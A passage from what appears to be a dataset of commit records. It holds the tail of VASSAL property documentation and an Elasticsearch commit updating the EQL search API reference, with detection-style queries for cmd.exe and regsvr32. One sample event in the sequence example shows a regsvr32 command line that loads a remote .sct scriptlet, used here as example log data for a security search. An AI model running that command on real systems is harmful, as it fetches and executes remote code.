<<NamedKeyCommand.adoc#top,Named Key Command>> .\n* The <<Label.adoc#top,Text Label>> trait substitutes properties when setting the text of the label.\n* A <<ZonedGrid.adoc#Zone,Zone>> uses properties to specify a <<ZonedGrid.adoc#ZoneHighlighter,Zone Highlighter>>.\n\n*Properties defined by Game Pieces*\n\n* The <<BasicPiece.adoc#top,Basic Piece>> defines properties related to a piece's name, location, side, and whether it's selected.\n\n* The <<Layer.adoc#Properties,Layer>> trait defines properties related to the state of that Layer.\n* The <<Rotate.adoc#top,Rotate>> trait defines properties related to the current facing of the piece.\n\n* The <<Label.adoc#top,Text Label>> trait returns the value of the label as a property.\n* The <<PropertyMarker.adoc#top,Marker>> trait allows you to define your own static properties.\n* The <<DynamicProperty.adoc#top,Dynamic Property>> trait allows you to define your own changeable properties.\n\n* The <<MarkMoved.adoc#top,Mark When Moved>> trait sets a property when a piece has moved.\n* The <<Mask.adoc#Properties,Mask>> trait sets a property when the piece is masked.\n* The <<Hideable.adoc#top,Invisible>> trait sets a property when the piece is invisible.\n\n* The <<PropertySheet.adoc#top,Property Sheet>> trait exposes a set of user-editable properties.\n\n*Properties defined by other components*\n\n* The <<GlobalProperties.adoc#top,Global Property>> component defines properties for a <<ZonedGrid.adoc#Zone,Zone>>, <<Map.adoc#top,Map>> or the <<GameModule.adoc#top,module>>.\n* The <<GlobalOptions.adoc#top,Global Options>> component allows you to tie property values to preferences settings.\n* The results of a roll by a <<GameModule.adoc#DiceButton,Dice Button>> is exposed as a property\n* A <<Deck.adoc#top,Deck>> component exposes the number of cards remaining as a Map-level property.\n|===\n\n==== Handy Combined List of VASSAL-defined Properties for Game Pieces\n\n|===\n|Property |Trait |Description\n|*BasicName* |<<BasicPiece.adoc#top,Basic Piece>> |The basic name of the piece.\n|*ClickedX* |Basic Piece |Map X-coordinate where player last right-clicked on piece to bring up context menu (or 0 if never).\n|*ClickedY* |Basic Piece |Map Y-coordinate where player last right-clicked on piece to bring up context menu (or 0 if never).\n|*CurrentBoard* |Basic Piece |Current Board name or \"\" if not on a map.\n|*CurrentMap* |Basic Piece |Current Map name or \"\" if not on a map.\n|*CurrentX* |Basic Piece |Current X-coordinate of the piece.\n|*CurrentY* |Basic Piece |Current Y-coordinate of the piece.\n|*CurrentZone* |Basic Piece |Current Zone name if the current map has a <<ZonedGrid.adoc#top,multi-zoned grid>>, or \"\" if the piece is not in any zone, or not on a map.\n|*DeckName* |Basic Piece |Current Deck name if stacked in a <<Deck.adoc#top,Deck>>, or \"\" if not in a Deck.\n|*IgnoreGrid* |<<NonStacking.adoc#top,Does not stack>> |\"true\" if this piece ignores the map grid when moving.\n|*Immobile* |<<NonStacking.adoc#top,Does not stack>> |\"true\" if this piece cannot be moved by drag and drop.\n|*Invisible* |<<Hideable.adoc#top,Invisible>> |\"true\" if this piece is invisible to the current player.\n|*InvisibleToOthers* |<<Hideable.adoc#top,Invisible>> |\"true\" if this piece is invisible to other players.\n|*LocationName* |Basic Piece |Name of the piece's current location, as determined by the map's <<ZonedGrid.adoc#Zone,Zone>> (if any) and grid settings.\n|*Moved* |<<MarkMoved.adoc#top,Mark When Moved>> |\"true\" if this piece has moved since the last time its movement history was cleared.\n|*NoStack* |<<NonStacking.adoc#top,Does not stack>> |\"true\" if this piece cannot stack with other pieces.\n|*Obscured* |<<Mask.adoc#top,Mask>> |\"true\" if this piece is masked from the current player.\n|*ObscuredToOthers* |<<Mask.adoc#top,Mask>> |\"true\" if this piece is masked from other players.\n|*OldBoard* |Basic Piece |Board name prior to most recent movement.\n|*OldLocationName* |Basic Piece |Location name prior to most recent movement.\n|*OldMap* |Basic Piece |Map name prior to most recent movement.\n|*OldX* |Basic Piece |X coordinate prior to most recent movement.\n|*OldY* |Basic Piece |Y coordinate prior to most recent movement.\n|*OldZone* |Basic Piece |Zone name prior to most recent movement.\n|*PieceName* |Basic Piece |Full piece name including both Basic Name and all additional strings provided by traits.\n|*playerSide* |Basic Piece |Side of the current player (not the side of the piece).\n|*Restricted* |<<RestrictedAccess.adoc#top,Restricted Access>> |\"true\" if there are restrictions as to who can access this piece.\n|*Selected* |Basic Piece |\"true\" if the piece is currently selected.\n|*_<property_name>_* |<<PropertySheet.adoc#top,PropertySheet>> |The value of each property on the Property Sheet can be accessed via the property name.\n|*_<layername>__Active* |<<Layer.adoc#top,Layer>> |\"true\" if the Layer _<layername>_ is currently active.\n|*_<layername>__Image* |<<Layer.adoc#top,Layer>> |The image name of the currently active layer for _Layer_ _<layername>_.\n|*_<layername>__Level* |<<Layer.adoc#top,Layer>> |The level number of the currently active layer for _Layer_ _<layername>_.\n|*_<layername>__Name* |<<Layer.adoc#top,Layer>> |The level name of the currently active layer for _Layer_ _<layername>_.\n|*_<rotatename>__Facing* |<<Rotate.adoc#top,Can Rotate>> |The current facing number (1, 2, etc) for the _Can Rotate_ trait _<rotatename>_.\n|*_<rotatename>__Degrees* |<<Rotate.adoc#top,Can Rotate>> |The current degrees of rotation for the _Can Rotate_ trait _<name>_.\n|_<Property Name>_ |<<Label.adoc#top,Text Label>> |If the \"Property Name\" field in the trait is filled out, then a property with that name will be filled with the current value of the _Text Label_ trait's Text field.\n|*_<deckname>__numPieces* |<<Deck.adoc#top,Deck>> (Map level property) |Number of pieces\/\"cards\" in the _Deck_ _<deckname>_.\n|*_<deckname>___<expression_name>_* |<<Deck.adoc#top,Deck>> (Map level property) |The number of pieces\/\"cards\" for which the named expression evaluates to true in the _Deck_ _<deckname>_.\n|===\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"857c2d1cd49e66a1323ec9bb548b26b62b8383f3","subject":"[DOCS] Update `ignore_unavailable` default for EQL search API (#63210)","message":"[DOCS] Update `ignore_unavailable` default for EQL search API (#63210)\n\n","repos":"robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/reference\/eql\/eql-search-api.asciidoc","new_file":"docs\/reference\/eql\/eql-search-api.asciidoc","new_contents":"[role=\"xpack\"]\n[testenv=\"basic\"]\n\n[[eql-search-api]]\n=== EQL search API\n++++\n<titleabbrev>EQL search<\/titleabbrev>\n++++\n\nbeta::[]\n\nReturns search results for an <<eql,Event Query Language (EQL)>> query.\n\nEQL assumes each document in a data stream or index corresponds to an\nevent.\n\n[source,console]\n----\nGET \/my-index-000001\/_eql\/search\n{\n \"query\": \"\"\"\n process where process.name == \"regsvr32.exe\"\n \"\"\"\n}\n----\n\/\/ TEST[setup:sec_logs]\n\n[[eql-search-api-request]]\n==== {api-request-title}\n\n`GET \/<target>\/_eql\/search`\n\n`POST \/<target>\/_eql\/search`\n\n[[eql-search-api-prereqs]]\n==== {api-prereq-title}\n\nSee <<eql-required-fields>>.\n\n[[eql-search-api-limitations]]\n===== Limitations\n\nSee <<eql-syntax-limitations,EQL limitations>>.\n\n[[eql-search-api-path-params]]\n==== {api-path-parms-title}\n\n`<target>`::\n(Required, string)\nComma-separated list of data streams, indices, or <<indices-aliases,index\naliases>> used to limit the request. Accepts wildcard (`*`) expressions.\n+\nTo search all data streams and indices in a cluster, use\n`_all` or `*`.\n\n[[eql-search-api-query-params]]\n==== {api-query-parms-title}\n\ninclude::{es-repo-dir}\/rest-api\/common-parms.asciidoc[tag=allow-no-indices]\n+\nDefaults to `false`.\n\ninclude::{es-repo-dir}\/rest-api\/common-parms.asciidoc[tag=expand-wildcards]\n+\nDefaults to `open`.\n\n`ignore_unavailable`::\n(Optional, boolean) If `true`, missing or closed indices are not included in the\nresponse. Defaults to `true`.\n\n`keep_alive`::\n+\n--\n(Optional, <<time-units,time value>>)\nPeriod for which the search and its results are stored on the cluster. Defaults\nto `5d` (five days).\n\nWhen this period expires, the search and its results are deleted, even if the\nsearch is still ongoing.\n\nIf the <<eql-search-api-keep-on-completion,`keep_on_completion`>> parameter is\n`false`, {es} only stores <<eql-search-async,async searches>> that do not\ncomplete within the period set by the\n<<eql-search-api-wait-for-completion-timeout,`wait_for_completion_timeout`>>\nparameter, regardless of this value.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `keep_alive` request body parameter.\nIf both parameters are specified, only the query parameter is used.\n====\n--\n\n`keep_on_completion`::\n+\n--\n(Optional, boolean)\nIf `true`, the search and its results are stored on the cluster.\n\nIf `false`, the search and its results are stored on the cluster only if the\nrequest does not complete during the period set by the\n<<eql-search-api-wait-for-completion-timeout,`wait_for_completion_timeout`>>\nparameter. Defaults to `false`.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `keep_on_completion` request body\nparameter. If both parameters are specified, only the query parameter is used.\n====\n--\n\n`wait_for_completion_timeout`::\n+\n--\n(Optional, <<time-units,time value>>)\nTimeout duration to wait for the request to finish. Defaults to no\ntimeout, meaning the request waits for complete search results.\n\nIf this parameter is specified and the request completes during this period,\ncomplete search results are returned.\n\nIf the request does not complete during this period, the search becomes an\n<<eql-search-async,async search>>.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `wait_for_completion_timeout` request\nbody parameter. If both parameters are specified, only the query parameter is\nused.\n====\n--\n\n[[eql-search-api-request-body]]\n==== {api-request-body-title}\n\n`event_category_field`::\n(Required*, string)\nField containing the event classification, such as `process`, `file`, or\n`network`.\n+\nDefaults to `event.category`, as defined in the {ecs-ref}\/ecs-event.html[Elastic\nCommon Schema (ECS)]. If a data stream or index does not contain the\n`event.category` field, this value is required.\n+\nThe event category field must be mapped as a field type in the\n<<keyword,`keyword`>> family.\n\n`fetch_size`::\n(Optional, integer)\nMaximum number of events to search at a time for sequence queries. Defaults to\n`1000`.\n+\nThis value must be greater than `2` but cannot exceed the value of the\n<<index-max-result-window,`index.max_result_window`>> setting, which defaults to\n`10000`.\n+\nInternally, a sequence query fetches and paginates sets of events to search for\nmatches. This parameter controls the size of those sets. This parameter does not\nlimit the total number of events searched or the number of matching events\nreturned.\n+\nA greater `fetch_size` value often increases search speed but uses more memory.\n\n`filter`::\n(Optional, <<query-dsl,query DSL object>>)\nQuery, written in query DSL, used to filter the events on which the EQL query\nruns.\n\n`keep_alive`::\n+\n--\n(Optional, <<time-units,time value>>)\nPeriod for which the search and its results are stored on the cluster. Defaults\nto `5d` (five days).\n\nWhen this period expires, the search and its results are deleted, even if the\nsearch is still ongoing.\n\nIf the <<eql-search-api-keep-on-completion,`keep_on_completion`>> parameter is\n`false`, {es} only stores <<eql-search-async,async searches>> that do not\ncomplete within the period set by the\n<<eql-search-api-wait-for-completion-timeout,`wait_for_completion_timeout`>>\nparameter, regardless of this value.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `keep_alive` query parameter.\nIf both parameters are specified, only the query parameter is used.\n====\n--\n\n[[eql-search-api-keep-on-completion]]\n`keep_on_completion`::\n+\n--\n(Optional, boolean)\nIf `true`, the search and its results are stored on the cluster.\n\nIf `false`, the search and its results are stored on the cluster only if the\nrequest does not complete during the period set by the\n<<eql-search-api-wait-for-completion-timeout,`wait_for_completion_timeout`>>\nparameter. Defaults to `false`.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `keep_on_completion` query parameter.\nIf both parameters are specified, only the query parameter is used.\n====\n--\n\n[[eql-search-api-request-query-param]]\n`query`::\n(Required, string)\n<<eql-syntax,EQL>> query you wish to run.\n\n`size`::\n(Optional, integer or float)\nFor <<eql-basic-syntax,basic queries>>, the maximum number of matching events to\nreturn.\n+\nFor <<eql-sequences,sequence queries>>, the maximum number of matching sequences\nto return.\n+\nDefaults to `10`. This value must be greater than `0`.\n+\nNOTE: You cannot use <<eql-pipe-ref,pipes>>, such as `head` or `tail`, to exceed\nthis value.\n\n[[eql-search-api-tiebreaker-field]]\n`tiebreaker_field`::\n(Optional, string)\nField used to sort events with the same\n<<eql-search-api-timestamp-field,timestamp field>> value. Defaults to\n`event.sequence`, as defined in the {ecs-ref}\/ecs-event.html[Elastic Common\nSchema (ECS)].\n+\nBy default, matching events in the search response are sorted by timestamp,\nconverted to milliseconds since the {wikipedia}\/Unix_time[Unix\nepoch], in ascending order. If two or more events share the same timestamp, this\nfield is used to sort the events in ascending, lexicographic order.\n\n[[eql-search-api-timestamp-field]]\n`timestamp_field`::\n+\n--\n(Required*, string)\nField containing event timestamp.\n\nDefaults to `@timestamp`, as defined in the\n{ecs-ref}\/ecs-event.html[Elastic Common Schema (ECS)]. If a data stream or index\ndoes not contain the `@timestamp` field, this value is required.\n\nEvents in the API response are sorted by this field's value, converted to\nmilliseconds since the {wikipedia}\/Unix_time[Unix epoch], in\nascending order.\n\nThe timestamp field should be mapped as a <<date,`date`>>. The\n<<date_nanos,`date_nanos`>> field type is not supported.\n--\n\n[[eql-search-api-wait-for-completion-timeout]]\n`wait_for_completion_timeout`::\n+\n--\n(Optional, <<time-units,time value>>)\nTimeout duration to wait for the request to finish. Defaults to no\ntimeout, meaning the request waits for complete search results.\n\nIf this parameter is specified and the request completes during this period,\ncomplete search results are returned.\n\nIf the request does not complete during this period, the search becomes an\n<<eql-search-async,async search>>.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `wait_for_completion_timeout` query\nparameter. If both parameters are specified, only the query parameter is used.\n====\n--\n\n[role=\"child_attributes\"]\n[[eql-search-api-response-body]]\n==== {api-response-body-title}\n\n[[eql-search-api-response-body-search-id]]\n`id`::\n+\n--\n(string)\nIdentifier for the search.\n\nThis search ID is only provided if one of the following conditions is met:\n\n* A search request does not return complete results during the\n <<eql-search-api-wait-for-completion-timeout,`wait_for_completion_timeout`>>\n parameter's timeout period, becoming an <<eql-search-async,async search>>.\n \n* The search request's <<eql-search-api-keep-on-completion,`keep_on_completion`>>\n parameter is `true`.\n\nYou can use this ID with the <<get-async-eql-search-api,get async EQL search\nAPI>> to get the current status and available results for the search.\n--\n\n`is_partial`::\n(boolean)\nIf `true`, the response does not contain complete search results.\n\n`is_running`::\n+\n--\n(boolean)\nIf `true`, the search request is still executing.\n\n[IMPORTANT]\n====\nIf this parameter and the `is_partial` parameter are `true`, the search is an\n<<eql-search-async,ongoing async search>>. If the `keep_alive` period does not\npass, the complete search results will be available when the search completes.\n\nIf `is_partial` is `true` but `is_running` is `false`, the search returned\npartial results due to a failure. Only some shards returned results or the node\ncoordinating the search failed.\n====\n--\n\n`took`::\n+\n--\n(integer)\nMilliseconds it took {es} to execute the request.\n\nThis value is calculated by measuring the time elapsed\nbetween receipt of a request on the coordinating node\nand the time at which the coordinating node is ready to send the response.\n\nTook time includes:\n\n* Communication time between the coordinating node and data nodes\n* Time the request spends in the `search` <<modules-threadpool,thread pool>>,\n queued for execution\n* Actual execution time\n\nTook time does *not* include:\n\n* Time needed to send the request to {es}\n* Time needed to serialize the JSON response\n* Time needed to send the response to a client\n--\n\n`timed_out`::\n(boolean)\nIf `true`, the request timed out before completion.\n\n`hits`::\n(object)\nContains matching events and sequences. Also contains related metadata.\n+\n.Properties of `hits`\n[%collapsible%open]\n====\n\n`total`::\n(object)\nMetadata about the number of matching events or sequences.\n+\n.Properties of `total`\n[%collapsible%open]\n=====\n\n`value`::\n(integer)\nFor <<eql-basic-syntax,basic queries>>, the total number of matching events.\n+\nFor <<eql-sequences,sequence queries>>, the total number of matching sequences.\n\n`relation`::\n+\n--\n(string)\nIndicates whether the number of events or sequences returned is accurate or a\nlower bound.\n\nReturned values are:\n\n`eq`::: Accurate\n`gte`::: Lower bound, including returned events or sequences\n--\n=====\n\n`sequences`::\n(array of objects)\nContains event sequences matching the query. Each object represents a\nmatching sequence. This parameter is only returned for EQL queries containing\na <<eql-sequences,sequence>>.\n+\n.Properties of `sequences` objects\n[%collapsible%open]\n=====\n`join_keys`::\n(array of values)\nShared field values used to constrain matches in the sequence. These are defined\nusing the <<eql-sequences,`by` keyword>> in the EQL query syntax.\n\n`events`::\n(array of objects)\nContains events matching the query. Each object represents a\nmatching event.\n+\n.Properties of `events` objects\n[%collapsible%open]\n======\n`_index`::\n(string)\nName of the index containing the event.\n\n`_id`::\n(string)\nUnique identifier for the event.\nThis ID is only unique within the index.\n\n`_source`::\n(object)\nOriginal JSON body passed for the event at index time.\n======\n=====\n\n[[eql-search-api-response-events]]\n`events`::\n(array of objects)\nContains events matching the query. Each object represents a\nmatching event.\n+\n.Properties of `events` objects\n[%collapsible%open]\n=====\n`_index`::\n(string)\nName of the index containing the event.\n\n`_id`::\n(string)\n(string)\nUnique identifier for the event.\nThis ID is only unique within the index.\n\n`_source`::\n(object)\nOriginal JSON body passed for the event at index time.\n=====\n====\n\n[[eql-search-api-example]]\n==== {api-examples-title}\n\n[[eql-search-api-basic-query-ex]]\n===== Basic query example\n\nThe following EQL search request searches for events with an `event.category` of\n`process` that meet the following conditions:\n\n* A `process.name` of `cmd.exe`\n* An `process.pid` other than `2013`\n\n[source,console]\n----\nGET \/my-index-000001\/_eql\/search\n{\n \"query\": \"\"\"\n process where (process.name == \"cmd.exe\" and process.pid != 2013)\n \"\"\"\n}\n----\n\/\/ TEST[setup:sec_logs]\n\nThe API returns the following response. Matching events in the `hits.events`\nproperty are sorted by <<eql-search-api-timestamp-field,timestamp>>, converted\nto milliseconds since the {wikipedia}\/Unix_time[Unix epoch],\nin ascending order.\n\nIf two or more events share the same timestamp, the\n<<eql-search-api-tiebreaker-field,`tiebreaker_field`>> field is used to sort\nthe events in ascending, lexicographic order.\n\n[source,console-result]\n----\n{\n \"is_partial\": false,\n \"is_running\": false,\n \"took\": 6,\n \"timed_out\": false,\n \"hits\": {\n \"total\": {\n \"value\": 2,\n \"relation\": \"eq\"\n },\n \"events\": [\n {\n \"_index\": \"my-index-000001\",\n \"_id\": \"babI3XMBI9IjHuIqU0S_\",\n \"_source\": {\n \"@timestamp\": \"2099-12-06T11:04:05.000Z\",\n \"event\": {\n \"category\": \"process\",\n \"id\": \"edwCRnyD\",\n \"sequence\": 1\n },\n \"process\": {\n \"pid\": 2012,\n \"name\": \"cmd.exe\",\n \"executable\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\"\n }\n }\n },\n {\n \"_index\": \"my-index-000001\",\n \"_id\": \"b6bI3XMBI9IjHuIqU0S_\",\n \"_source\": {\n \"@timestamp\": \"2099-12-07T11:06:07.000Z\",\n \"event\": {\n \"category\": \"process\",\n \"id\": \"cMyt5SZ2\",\n \"sequence\": 3\n },\n \"process\": {\n \"pid\": 2012,\n \"name\": \"cmd.exe\",\n \"executable\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\"\n }\n }\n }\n ]\n }\n}\n----\n\/\/ TESTRESPONSE[s\/\"took\": 6\/\"took\": $body.took\/]\n\/\/ TESTRESPONSE[s\/\"_id\": \"babI3XMBI9IjHuIqU0S_\"\/\"_id\": $body.hits.events.0._id\/]\n\/\/ TESTRESPONSE[s\/\"_id\": \"b6bI3XMBI9IjHuIqU0S_\"\/\"_id\": $body.hits.events.1._id\/]\n\n[[eql-search-api-sequence-ex]]\n===== Sequence query example\n\nThe following EQL search request matches a <<eql-sequences,sequence>> of events\nthat:\n\n. Start with an event with:\n+\n--\n* An `event.category` of `file`\n* A `file.name` of `cmd.exe`\n* An `process.pid` other than `2013`\n--\n. Followed by an event with:\n+\n--\n* An `event.category` of `process`\n* A `process.executable` that contains the substring `regsvr32`\n--\n\nThese events must also share the same `process.pid` value.\n\n[source,console]\n----\nGET \/my-index-000001\/_eql\/search\n{\n \"query\": \"\"\"\n sequence by process.pid\n [ file where file.name == \"cmd.exe\" and process.pid != 2013 ]\n [ process where stringContains(process.executable, \"regsvr32\") ]\n \"\"\"\n}\n----\n\/\/ TEST[setup:sec_logs]\n\nThe API returns the following response. Matching sequences are included in the\n`hits.sequences` property. The `hits.sequences.join_keys` property contains the\nshared `process.pid` value for each matching event.\n\n[source,console-result]\n----\n{\n \"is_partial\": false,\n \"is_running\": false,\n \"took\": 6,\n \"timed_out\": false,\n \"hits\": {\n \"total\": {\n \"value\": 1,\n \"relation\": \"eq\"\n },\n \"sequences\": [\n {\n \"join_keys\": [\n 2012\n ],\n \"events\": [\n {\n \"_index\": \"my-index-000001\",\n \"_id\": \"AtOJ4UjUBAAx3XR5kcCM\",\n \"_source\": {\n \"@timestamp\": \"2099-12-06T11:04:07.000Z\",\n \"event\": {\n \"category\": \"file\",\n \"id\": \"dGCHwoeS\",\n \"sequence\": 2\n },\n \"file\": {\n \"accessed\": \"2099-12-07T11:07:08.000Z\",\n \"name\": \"cmd.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"type\": \"file\",\n \"size\": 16384\n },\n \"process\": {\n \"pid\": 2012,\n \"name\": \"cmd.exe\",\n \"executable\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\"\n }\n }\n },\n {\n \"_index\": \"my-index-000001\",\n \"_id\": \"OQmfCaduce8zoHT93o4H\",\n \"_source\": {\n \"@timestamp\": \"2099-12-07T11:07:09.000Z\",\n \"event\": {\n \"category\": \"process\",\n \"id\": \"aR3NWVOs\",\n \"sequence\": 4\n },\n \"process\": {\n \"pid\": 2012,\n \"name\": \"regsvr32.exe\",\n \"command_line\": \"regsvr32.exe \/s \/u \/i:https:\/\/...RegSvr32.sct scrobj.dll\",\n \"executable\": \"C:\\\\Windows\\\\System32\\\\regsvr32.exe\"\n }\n }\n }\n ]\n }\n ]\n }\n}\n----\n\/\/ TESTRESPONSE[s\/\"took\": 6\/\"took\": $body.took\/]\n\/\/ TESTRESPONSE[s\/\"_id\": \"AtOJ4UjUBAAx3XR5kcCM\"\/\"_id\": $body.hits.sequences.0.events.0._id\/]\n\/\/ TESTRESPONSE[s\/\"_id\": \"OQmfCaduce8zoHT93o4H\"\/\"_id\": $body.hits.sequences.0.events.1._id\/]\n","old_contents":"[role=\"xpack\"]\n[testenv=\"basic\"]\n\n[[eql-search-api]]\n=== EQL search API\n++++\n<titleabbrev>EQL search<\/titleabbrev>\n++++\n\nbeta::[]\n\nReturns search results for an <<eql,Event Query Language (EQL)>> query.\n\nEQL assumes each document in a data stream or index corresponds to an\nevent.\n\n[source,console]\n----\nGET \/my-index-000001\/_eql\/search\n{\n \"query\": \"\"\"\n process where process.name == \"regsvr32.exe\"\n \"\"\"\n}\n----\n\/\/ TEST[setup:sec_logs]\n\n[[eql-search-api-request]]\n==== {api-request-title}\n\n`GET \/<target>\/_eql\/search`\n\n`POST \/<target>\/_eql\/search`\n\n[[eql-search-api-prereqs]]\n==== {api-prereq-title}\n\nSee <<eql-required-fields>>.\n\n[[eql-search-api-limitations]]\n===== Limitations\n\nSee <<eql-syntax-limitations,EQL limitations>>.\n\n[[eql-search-api-path-params]]\n==== {api-path-parms-title}\n\n`<target>`::\n(Required, string)\nComma-separated list of data streams, indices, or <<indices-aliases,index\naliases>> used to limit the request. Accepts wildcard (`*`) expressions.\n+\nTo search all data streams and indices in a cluster, use\n`_all` or `*`.\n\n[[eql-search-api-query-params]]\n==== {api-query-parms-title}\n\ninclude::{es-repo-dir}\/rest-api\/common-parms.asciidoc[tag=allow-no-indices]\n+\nDefaults to `false`.\n\ninclude::{es-repo-dir}\/rest-api\/common-parms.asciidoc[tag=expand-wildcards]\n+\nDefaults to `open`.\n\ninclude::{es-repo-dir}\/rest-api\/common-parms.asciidoc[tag=index-ignore-unavailable]\n\n`keep_alive`::\n+\n--\n(Optional, <<time-units,time value>>)\nPeriod for which the search and its results are stored on the cluster. Defaults\nto `5d` (five days).\n\nWhen this period expires, the search and its results are deleted, even if the\nsearch is still ongoing.\n\nIf the <<eql-search-api-keep-on-completion,`keep_on_completion`>> parameter is\n`false`, {es} only stores <<eql-search-async,async searches>> that do not\ncomplete within the period set by the\n<<eql-search-api-wait-for-completion-timeout,`wait_for_completion_timeout`>>\nparameter, regardless of this value.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `keep_alive` request body parameter.\nIf both parameters are specified, only the query parameter is used.\n====\n--\n\n`keep_on_completion`::\n+\n--\n(Optional, boolean)\nIf `true`, the search and its results are stored on the cluster.\n\nIf `false`, the search and its results are stored on the cluster only if the\nrequest does not complete during the period set by the\n<<eql-search-api-wait-for-completion-timeout,`wait_for_completion_timeout`>>\nparameter. Defaults to `false`.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `keep_on_completion` request body\nparameter. If both parameters are specified, only the query parameter is used.\n====\n--\n\n`wait_for_completion_timeout`::\n+\n--\n(Optional, <<time-units,time value>>)\nTimeout duration to wait for the request to finish. Defaults to no\ntimeout, meaning the request waits for complete search results.\n\nIf this parameter is specified and the request completes during this period,\ncomplete search results are returned.\n\nIf the request does not complete during this period, the search becomes an\n<<eql-search-async,async search>>.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `wait_for_completion_timeout` request\nbody parameter. If both parameters are specified, only the query parameter is\nused.\n====\n--\n\n[[eql-search-api-request-body]]\n==== {api-request-body-title}\n\n`event_category_field`::\n(Required*, string)\nField containing the event classification, such as `process`, `file`, or\n`network`.\n+\nDefaults to `event.category`, as defined in the {ecs-ref}\/ecs-event.html[Elastic\nCommon Schema (ECS)]. If a data stream or index does not contain the\n`event.category` field, this value is required.\n+\nThe event category field must be mapped as a field type in the\n<<keyword,`keyword`>> family.\n\n`fetch_size`::\n(Optional, integer)\nMaximum number of events to search at a time for sequence queries. Defaults to\n`1000`.\n+\nThis value must be greater than `2` but cannot exceed the value of the\n<<index-max-result-window,`index.max_result_window`>> setting, which defaults to\n`10000`.\n+\nInternally, a sequence query fetches and paginates sets of events to search for\nmatches. This parameter controls the size of those sets. This parameter does not\nlimit the total number of events searched or the number of matching events\nreturned.\n+\nA greater `fetch_size` value often increases search speed but uses more memory.\n\n`filter`::\n(Optional, <<query-dsl,query DSL object>>)\nQuery, written in query DSL, used to filter the events on which the EQL query\nruns.\n\n`keep_alive`::\n+\n--\n(Optional, <<time-units,time value>>)\nPeriod for which the search and its results are stored on the cluster. Defaults\nto `5d` (five days).\n\nWhen this period expires, the search and its results are deleted, even if the\nsearch is still ongoing.\n\nIf the <<eql-search-api-keep-on-completion,`keep_on_completion`>> parameter is\n`false`, {es} only stores <<eql-search-async,async searches>> that do not\ncomplete within the period set by the\n<<eql-search-api-wait-for-completion-timeout,`wait_for_completion_timeout`>>\nparameter, regardless of this value.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `keep_alive` query parameter.\nIf both parameters are specified, only the query parameter is used.\n====\n--\n\n[[eql-search-api-keep-on-completion]]\n`keep_on_completion`::\n+\n--\n(Optional, boolean)\nIf `true`, the search and its results are stored on the cluster.\n\nIf `false`, the search and its results are stored on the cluster only if the\nrequest does not complete during the period set by the\n<<eql-search-api-wait-for-completion-timeout,`wait_for_completion_timeout`>>\nparameter. Defaults to `false`.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `keep_on_completion` query parameter.\nIf both parameters are specified, only the query parameter is used.\n====\n--\n\n[[eql-search-api-request-query-param]]\n`query`::\n(Required, string)\n<<eql-syntax,EQL>> query you wish to run.\n\n`size`::\n(Optional, integer or float)\nFor <<eql-basic-syntax,basic queries>>, the maximum number of matching events to\nreturn.\n+\nFor <<eql-sequences,sequence queries>>, the maximum number of matching sequences\nto return.\n+\nDefaults to `10`. This value must be greater than `0`.\n+\nNOTE: You cannot use <<eql-pipe-ref,pipes>>, such as `head` or `tail`, to exceed\nthis value.\n\n[[eql-search-api-tiebreaker-field]]\n`tiebreaker_field`::\n(Optional, string)\nField used to sort events with the same\n<<eql-search-api-timestamp-field,timestamp field>> value. Defaults to\n`event.sequence`, as defined in the {ecs-ref}\/ecs-event.html[Elastic Common\nSchema (ECS)].\n+\nBy default, matching events in the search response are sorted by timestamp,\nconverted to milliseconds since the {wikipedia}\/Unix_time[Unix\nepoch], in ascending order. If two or more events share the same timestamp, this\nfield is used to sort the events in ascending, lexicographic order.\n\n[[eql-search-api-timestamp-field]]\n`timestamp_field`::\n+\n--\n(Required*, string)\nField containing event timestamp.\n\nDefaults to `@timestamp`, as defined in the\n{ecs-ref}\/ecs-event.html[Elastic Common Schema (ECS)]. If a data stream or index\ndoes not contain the `@timestamp` field, this value is required.\n\nEvents in the API response are sorted by this field's value, converted to\nmilliseconds since the {wikipedia}\/Unix_time[Unix epoch], in\nascending order.\n\nThe timestamp field should be mapped as a <<date,`date`>>. The\n<<date_nanos,`date_nanos`>> field type is not supported.\n--\n\n[[eql-search-api-wait-for-completion-timeout]]\n`wait_for_completion_timeout`::\n+\n--\n(Optional, <<time-units,time value>>)\nTimeout duration to wait for the request to finish. Defaults to no\ntimeout, meaning the request waits for complete search results.\n\nIf this parameter is specified and the request completes during this period,\ncomplete search results are returned.\n\nIf the request does not complete during this period, the search becomes an\n<<eql-search-async,async search>>.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `wait_for_completion_timeout` query\nparameter. If both parameters are specified, only the query parameter is used.\n====\n--\n\n[role=\"child_attributes\"]\n[[eql-search-api-response-body]]\n==== {api-response-body-title}\n\n[[eql-search-api-response-body-search-id]]\n`id`::\n+\n--\n(string)\nIdentifier for the search.\n\nThis search ID is only provided if one of the following conditions is met:\n\n* A search request does not return complete results during the\n <<eql-search-api-wait-for-completion-timeout,`wait_for_completion_timeout`>>\n parameter's timeout period, becoming an <<eql-search-async,async search>>.\n \n* The search request's <<eql-search-api-keep-on-completion,`keep_on_completion`>>\n parameter is `true`.\n\nYou can use this ID with the <<get-async-eql-search-api,get async EQL search\nAPI>> to get the current status and available results for the search.\n--\n\n`is_partial`::\n(boolean)\nIf `true`, the response does not contain complete search results.\n\n`is_running`::\n+\n--\n(boolean)\nIf `true`, the search request is still 